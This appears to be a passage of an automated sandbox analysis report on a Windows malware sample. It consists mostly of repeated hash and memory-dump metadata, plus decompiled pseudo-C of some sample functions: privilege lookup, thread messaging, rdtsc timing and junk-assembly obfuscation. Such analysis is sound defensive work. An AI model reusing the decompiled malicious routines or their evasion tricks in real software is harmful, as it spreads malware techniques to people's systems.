                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 008CFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205871516.00000000008C0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205866779.00000000008B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205992507.00000000009A0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2205997068.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206002218.00000000009B4000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206010465.00000000009B7000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206016745.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          • Associated: 00000005.00000002.2206097137.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 95%
                                                                                                                                                                                                          			E004088B0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				signed int _t31;
				signed int _t33;
				void* _t34;
				signed int _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(__eflags, E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							__eflags = _t31;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							__eflags = _t50 - 0x62;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							L8:
							_t33 = E00407040( &_v24,  &_v840);
							_t55 = _t56 + 8;
							__eflags = _t33;
							if(_t33 != 0) {
								goto L9;
							}
							goto L10;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						_t10 = _t52 + 0x474;
						 *_t10 =  *(_t52 + 0x474) ^  *_t9;
						__eflags =  *_t10;
						_t39 = 1;
						goto L8;
						L9:
						__eflags = _t39;
					} while (_t39 == 0);
					L10:
					_t34 = E004070C0(_t52,  &_v24); // executed
					__eflags = _t39;
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						_t16 = _t52 + 0x55c;
						 *_t16 =  *(_t52 + 0x55c) + 0xffffffba;
						__eflags =  *_t16;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					_t21 = _t52 + 0x32;
					 *_t21 =  *(_t52 + 0x32) +  *_t20 + 1;
					__eflags =  *_t21;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                                                                                                          0x004088bb
                                                                                                                                                                                                          0x004088c3
                                                                                                                                                                                                          0x004088c5
                                                                                                                                                                                                          0x004088ca
                                                                                                                                                                                                          0x004088cf
                                                                                                                                                                                                          0x004088e2
                                                                                                                                                                                                          0x004088e7
                                                                                                                                                                                                          0x004088f0
                                                                                                                                                                                                          0x004088fc
                                                                                                                                                                                                          0x0040890f
                                                                                                                                                                                                          0x00408914
                                                                                                                                                                                                          0x00408917
                                                                                                                                                                                                          0x00408920
                                                                                                                                                                                                          0x00408932
                                                                                                                                                                                                          0x00408937
                                                                                                                                                                                                          0x0040893a
                                                                                                                                                                                                          0x0040893c
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x0040893e
                                                                                                                                                                                                          0x0040893f
                                                                                                                                                                                                          0x00408942
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00408944
                                                                                                                                                                                                          0x00408951
                                                                                                                                                                                                          0x0040895c
                                                                                                                                                                                                          0x00408961
                                                                                                                                                                                                          0x00408964
                                                                                                                                                                                                          0x00408966
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00408966
                                                                                                                                                                                                          0x00408946
                                                                                                                                                                                                          0x00408949
                                                                                                                                                                                                          0x00408949
                                                                                                                                                                                                          0x00408949
                                                                                                                                                                                                          0x0040894f
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x00408968
                                                                                                                                                                                                          0x00408968
                                                                                                                                                                                                          0x00408968
                                                                                                                                                                                                          0x0040896c
                                                                                                                                                                                                          0x00408971
                                                                                                                                                                                                          0x0040897a
                                                                                                                                                                                                          0x0040897c
                                                                                                                                                                                                          0x0040897e
                                                                                                                                                                                                          0x00408984
                                                                                                                                                                                                          0x00408988
                                                                                                                                                                                                          0x0040898b
                                                                                                                                                                                                          0x0040898b
                                                                                                                                                                                                          0x0040898b
                                                                                                                                                                                                          0x0040898b
                                                                                                                                                                                                          0x00408992
                                                                                                                                                                                                          0x00408995
                                                                                                                                                                                                          0x0040899a
                                                                                                                                                                                                          0x0040899a
                                                                                                                                                                                                          0x0040899a
                                                                                                                                                                                                          0x004089a7
                                                                                                                                                                                                          0x004088d6
                                                                                                                                                                                                          0x004088d6
                                                                                                                                                                                                          0x004088d6

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000002.2205793716.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                                                                          • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 74%
                                                                                                                                                                                                          			E00407260(void* __ebx, void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				void* _t21;
				long _t24;
				intOrPtr* _t28;
				void* _t29;
				void* _t33;

				_t33 = __eflags;
				_t21 = __edx;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900(__ebx, _t21,  &_v68, 3);
				_t12 = E00409B20(_t33, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t28 = _t13;
				if(_t28 != 0) {
					_t24 = _a8;
					_t14 = PostThreadMessageW(_t24, 0x111, 0, 0);
					asm("salc"); // executed
					_t35 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t28(_t24, 0x8003, _t29 + (E00409280(_t35, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}













                                                                                                                                                                                                          0x00407260
                                                                                                                                                                                                          0x00407260
                                                                                                                                                                                                          0x0040726f
                                                                                                                                                                                                          0x00407273
                                                                                                                                                                                                          0x0040727e
                                                                                                                                                                                                          0x0040728e
                                                                                                                                                                                                          0x0040729e
                                                                                                                                                                                                          0x004072a3
                                                                                                                                                                                                          0x004072aa
                                                                                                                                                                                                          0x004072ad
                                                                                                                                                                                                          0x004072ba
                                                                                                                                                                                                          0x004072bb
                                                                                                                                                                                                          0x004072bc
                                                                                                                                                                                                          0x004072be
                                                                                                                                                                                                          0x004072db
                                                                                                                                                                                                          0x004072db
                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                          0x004072dd
                                                                                                                                                                                                          0x004072e2

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                          • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                                                                                                          • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00407233, Relevance: 1.5, APIs: 1, Instructions: 41threadwindowCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 20%
                                                                                                                                                                                                          			E00407233(void* __eax, signed int __edx, void* __esi) {
				intOrPtr* _t6;

				_t6 = __eax - 0xe1;
				asm("das");
				asm("das");
				asm("loop 0x62");
				asm("adc esp, [ebp-0x751e73a0]");
				 *(__esi + 0x68) =  *(__esi + 0x68) | __edx;
				_push(__esi);
				_push(0x11c6f95e);
				asm("adc eax, ebp");
				 *_t6 =  *_t6 + _t6;
				return E004195B0(0x24) + _t6 + 0x1000;
			}




                                                                                                                                                                                                          0x00407233
                                                                                                                                                                                                          0x00407235
                                                                                                                                                                                                          0x00407236
                                                                                                                                                                                                          0x00407237
                                                                                                                                                                                                          0x00407239
                                                                                                                                                                                                          0x0040723f
                                                                                                                                                                                                          0x00407240
                                                                                                                                                                                                          0x00407241
                                                                                                                                                                                                          0x00407245
                                                                                                                                                                                                          0x00407249
                                                                                                                                                                                                          0x0040725d

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessagePostThread
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 1836367815-0
                                                                                                                                                                                                          • Opcode ID: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                                                                                                                                          • Instruction ID: c471a7a482c4acc8b97cc48f06a4835c8e75f01e11c13bfe5c3798fee8e62ae7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7997dd6130d69d6a6cdf66612845a13fcb068ba07fa9f9ab66acc80c3af8de7a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4F0E931E842243AE72056555C03FFAB7589B80B11F14457FFE44B92C2E6A96C0686E6
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                                          			E00418621(void* __edx, intOrPtr* __esi, void* __eflags, int _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				char _v117;

				if(__eflags > 0) {
					asm("adc al, 0x50");
					_push(_a16);
					_push(_a12);
					return  *((intOrPtr*)( *__esi))();
				} else {
					0x2e296bd8();
					_t4 =  &_v117;
					 *_t4 = _v117 - __dl;
					__eflags =  *_t4;
					__ebp = __esp;
					__eax = _a4;
					__esi = _a4 + 0xc8c;
					__eax = E00418DC0(__edi, __eax, __esi,  *((intOrPtr*)(__eax + 0xa18)), 0, 0x46);
					__edx = _a16;
					__eax = _a12;
					__edx =  *__esi;
					__eax = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}




                                                                                                                                                                                                          0x00418628
                                                                                                                                                                                                          0x0041860e
                                                                                                                                                                                                          0x0041861a
                                                                                                                                                                                                          0x0041861b
                                                                                                                                                                                                          0x00418620
                                                                                                                                                                                                          0x0041862a
                                                                                                                                                                                                          0x0041862a
                                                                                                                                                                                                          0x0041862f
                                                                                                                                                                                                          0x0041862f
                                                                                                                                                                                                          0x0041862f
                                                                                                                                                                                                          0x00418631
                                                                                                                                                                                                          0x00418633
                                                                                                                                                                                                          0x00418642
                                                                                                                                                                                                          0x0041864a
                                                                                                                                                                                                          0x0041864f
                                                                                                                                                                                                          0x00418652
                                                                                                                                                                                                          0x0041865c
                                                                                                                                                                                                          0x00418660
                                                                                                                                                                                                          0x00418662
                                                                                                                                                                                                          0x00418663
                                                                                                                                                                                                          0x00418664
                                                                                                                                                                                                          0x00418664

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LookupPrivilegeValue
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3899507212-0
                                                                                                                                                                                                          • Opcode ID: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                                                                                                                                          • Instruction ID: 65204f1e0b89d90fab1e4f0e6e35f8594f9b64f63a7785db3f21326e2eb3355a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f68e4ba5911c09c1a664b835add706f56c52f169149eeadc05de385caee06865
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E9F0CDB22002086FDB24DFA5DC80EEB77ACEF88310F14864EF94D97201C934E9008BB4
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                          			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                                                                                                                                                          0x004184df
                                                                                                                                                                                                          0x004184e7
                                                                                                                                                                                                          0x004184fd
                                                                                                                                                                                                          0x00418501

                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000005.00000001.2164030475.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
